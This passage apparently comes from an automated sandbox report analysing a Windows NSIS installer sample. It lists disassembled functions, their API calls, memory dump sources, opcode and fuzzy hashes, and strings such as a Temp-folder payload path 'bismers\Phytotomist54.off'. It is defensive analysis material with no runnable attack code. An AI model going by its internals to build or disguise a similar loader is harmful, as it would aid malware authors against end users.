                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                • String ID: Calibri
                                                                • API String ID: 3808545654-1409258342
                                                                • Opcode ID: ff5e119c1dfec186f1bc31a23d162186e9d3ca2dfc2df7b145d176ccd9f6b251
                                                                • Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
                                                                • Opcode Fuzzy Hash: ff5e119c1dfec186f1bc31a23d162186e9d3ca2dfc2df7b145d176ccd9f6b251
                                                                • Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED
                                                                Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                • MulDiv.KERNEL32(00031200,00000064,000A398B), ref: 00402F74
                                                                • wsprintfW.USER32 ref: 00402F84
                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                • Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
                                                                • Opcode Fuzzy Hash: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                • Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58
                                                                Function 6EDF25B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 6EDF121B: GlobalAlloc.KERNELBASE(00000040,?,6EDF123B,?,6EDF12DF,00000019,6EDF11BE,-000000A0), ref: 6EDF1225
                                                                • GlobalFree.KERNEL32(?), ref: 6EDF26A3
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF26D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 333e702158817e416f144186e8e7f968dfddf392270222e541c180f63c86afd5
                                                                • Instruction ID: 3fcefed7ae5f761bd9f6c944e504a44ad5f4e52f37d15e9afde79babdc8dcb45
                                                                • Opcode Fuzzy Hash: 333e702158817e416f144186e8e7f968dfddf392270222e541c180f63c86afd5
                                                                • Instruction Fuzzy Hash: 4031BC31508582EFEB14CFE9ED94C6A77BAEF863093168529F14287260C731DC4B8B61
                                                                Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                • Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
                                                                • Opcode Fuzzy Hash: a5ba4848feea4339aca0bd9ed9ef3b7077546e738993ad0ee054be50b6b812c9
                                                                • Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8
                                                                Function 6EDF18D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal
                                                                • String ID:
                                                                • API String ID: 2979337801-0
                                                                • Opcode ID: 423715a67479cd5acb7bceacee70f35003bb17dcb5d5f46f8d3b7a5e35527c75
                                                                • Instruction ID: 66471e2865c8c107b7aced89f09a93b5e9f494dfa868aac8db119076c3a3121e
                                                                • Opcode Fuzzy Hash: 423715a67479cd5acb7bceacee70f35003bb17dcb5d5f46f8d3b7a5e35527c75
                                                                • Instruction Fuzzy Hash: F851C4F2D1405AEECB40DFE985805AEBAB9EF46314F038259D458A3106D771DE8F87A1
                                                                Function 6EDF23E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF2522
                                                                  • Part of subcall function 6EDF122C: lstrcpynW.KERNEL32(00000000,?,6EDF12DF,00000019,6EDF11BE,-000000A0), ref: 6EDF123C
                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6EDF24A8
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EDF24C3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                • String ID:
                                                                • API String ID: 4216380887-0
                                                                • Opcode ID: 87dd6b284cb29041c951dc359422f31ede3eb5cda367c107988e9d678476cc25
                                                                • Instruction ID: 3741bf4cbb61d827eef45c8b8fa962a6b227dcfc20a2af26e08ec1f1b3ceb8f0
                                                                • Opcode Fuzzy Hash: 87dd6b284cb29041c951dc359422f31ede3eb5cda367c107988e9d678476cc25
                                                                • Instruction Fuzzy Hash: F94108B0404785EFDB14DFE9D850A6A77F8FB55309F02881DE896C7281EB709947CB61
                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                • Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
                                                                • Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                • Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98
                                                                Function 6EDF161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6EDF2238,?,00000808), ref: 6EDF1635
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6EDF2238,?,00000808), ref: 6EDF163C
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6EDF2238,?,00000808), ref: 6EDF1650
                                                                • GetProcAddress.KERNEL32(6EDF2238,00000000), ref: 6EDF1657
                                                                • GlobalFree.KERNEL32(00000000), ref: 6EDF1660
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1649696285.000000006EDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EDF0000, based on PE: true
                                                                • Associated: 00000000.00000002.1649673053.000000006EDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649710611.000000006EDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000000.00000002.1649724182.000000006EDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6edf0000_No.jbxd
                                                                Similarity
                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                • String ID:
                                                                • API String ID: 1148316912-0
                                                                • Opcode ID: ff14fcbddbed815a101b0bfe9faf0de072adb6e259da8010c59a5936a3898d6b
                                                                • Instruction ID: 304fb29b8251300d286ea47725168df2c54aa250cb5c9f1e50495559879a10e9
                                                                • Opcode Fuzzy Hash: ff14fcbddbed815a101b0bfe9faf0de072adb6e259da8010c59a5936a3898d6b
                                                                • Instruction Fuzzy Hash: 80F01C722065387BEA2056AA9D4CC9BBE9CDF8B2F6B110211F6299219086614D03D7F1
                                                                Function 00404C14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                • wsprintfW.USER32 ref: 00404CBE
                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s
                                                                • API String ID: 3540041739-3551169577
                                                                • Opcode ID: 0de71dd1f65287a19c767322f40b6e95ae33ee85482e893f5b2d92d4d5838e0a
                                                                • Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
                                                                • Opcode Fuzzy Hash: 0de71dd1f65287a19c767322f40b6e95ae33ee85482e893f5b2d92d4d5838e0a
                                                                • Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC
                                                                Function 00405DEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(?,?,bismers\Phytotomist54.off,?,00405E05,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DA4
                                                                  • Part of subcall function 00405D91: CharNextW.USER32(00000000), ref: 00405DBC
                                                                • lstrlenW.KERNEL32(bismers\Phytotomist54.off,00000000,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405E47
                                                                • GetFileAttributesW.KERNEL32(bismers\Phytotomist54.off,bismers\Phytotomist54.off,bismers\Phytotomist54.off,bismers\Phytotomist54.off,bismers\Phytotomist54.off,bismers\Phytotomist54.off,00000000,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405E57
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$bismers\Phytotomist54.off
                                                                • API String ID: 3248276644-3408809149
                                                                • Opcode ID: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                • Instruction ID: 87735b5e832f2f8e04389b482ed260ad6458a913df04a2d72dce2697f876d431
                                                                • Opcode Fuzzy Hash: d647ba489e44e4c384e8f234fc99267bc74e37b9af3ba258ec0477dc6db0c33a
                                                                • Instruction Fuzzy Hash: A5F0F435104D2216C63233369D09AAF1548CE82364759453BF8D1B22D1DB3C8B838CED
                                                                Function 00405D91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextW.USER32(?,?,bismers\Phytotomist54.off,?,00405E05,bismers\Phytotomist54.off,bismers\Phytotomist54.off,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405B43,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405D9F
                                                                • CharNextW.USER32(00000000), ref: 00405DA4
                                                                • CharNextW.USER32(00000000), ref: 00405DBC
                                                                Strings
                                                                • bismers\Phytotomist54.off, xrefs: 00405D92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharNext
                                                                • String ID: bismers\Phytotomist54.off
                                                                • API String ID: 3213498283-3037600859
                                                                • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                • Instruction ID: a240d3eb33a110e9c3e2f54eb45e2ed3fb4308986edfa36c5622d0951adac79a
                                                                • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                • Instruction Fuzzy Hash: B5F09021910F2295DB3177645C4DABB5AB8EFA5364B14C03BE601B72C0D7B88981CBAA
                                                                Function 00405CE6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004034B2,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CEC
                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004034B2,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040370F,?,00000007,00000009,0000000B), ref: 00405CF6
                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405D08
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CE6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 2659869361-2382934351
                                                                • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                • Instruction ID: e2e9208f063340fd7176cb3713d1db1a131c248cac7d4947b15e4777b480a213
                                                                • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                • Instruction Fuzzy Hash: 4FD0A771101A306AC1117B84AC05DDF669CAE85300381403BF201B30A4C77C1D5187FD
                                                                Function 00402636 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp\System.dll), ref: 0040268D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1606783703.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1606769972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606798240.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606819022.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1606920867.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp$C:\Users\user~1\AppData\Local\Temp\nsy4AC1.tmp\System.dll
                                                                • API String ID: 1659193697-1232565689
                                                                • Opcode ID: 9f91aca178a37e6ed0b54cb78eabbee860e101ef043324f56c33086d30ece071
                                                                • Instruction ID: 2f8f56cab2ec293de193d712fca88bf9bcdcc229c68306483e13e7e6ef2e3e02
                                                                • Opcode Fuzzy Hash: 9f91aca178a37e6ed0b54cb78eabbee860e101ef043324f56c33086d30ece071
                                                                • Instruction Fuzzy Hash: AD11E772A00205ABCB10AFB18F4AAAF77719F44748F25043FE402B71C1EAFD8891565E
                                                                Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                • GetTickCount.KERNEL32 ref: 00402FE2
